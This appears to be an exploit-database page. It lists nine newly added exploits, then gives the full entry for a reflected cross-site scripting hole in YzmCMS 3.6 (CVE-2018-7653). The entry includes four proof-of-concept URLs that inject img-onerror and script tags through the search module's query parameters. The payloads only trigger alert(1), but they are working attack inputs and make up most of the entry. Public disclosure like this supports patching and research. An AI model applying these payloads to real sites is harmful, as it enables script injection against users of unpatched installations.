086c3ec61b
9 changes to exploits/shellcodes Microsoft Windows Defender - 'mpengine.dll' Memory Corruption Microsoft Windows - Multiple Use-After-Free Issues in jscript Array Methods MyBB Plugin Downloads 2.0.3 - Cross-Site Scripting Joomla! Component JS Jobs 1.2.0 - Cross-Site Scripting WebRTC - Private IP Leakage (Metasploit) YzmCMS 3.6 - Cross-Site Scripting Z-Blog 1.5.1.1740 - Cross-Site Scripting Z-Blog 1.5.1.1740 - Full Path Disclosure GetSimple CMS 3.3.13 - Cross-Site Scripting
19 lines
No EOL
807 B
Text
19 lines
No EOL
807 B
Text
# Exploit Title: YzmCMS 3.6 XSS Vulnerability
|
|
# Date: 2018-04-03
|
|
# Exploit Author: zzw (zzw@5ecurity.cn)
|
|
# Vendor Homepage: http://www.yzmcms.com/
|
|
# Software Link: http://www.yzmcms.com/
|
|
# Version: 3.6
|
|
# CVE : CVE-2018-7653
|
|
|
|
This is a XSS vulnerability than can attack the users.
|
|
|
|
poc:
|
|
|
|
http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes
|
|
|
|
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes
|
|
|
|
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes
|
|
|
|
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes |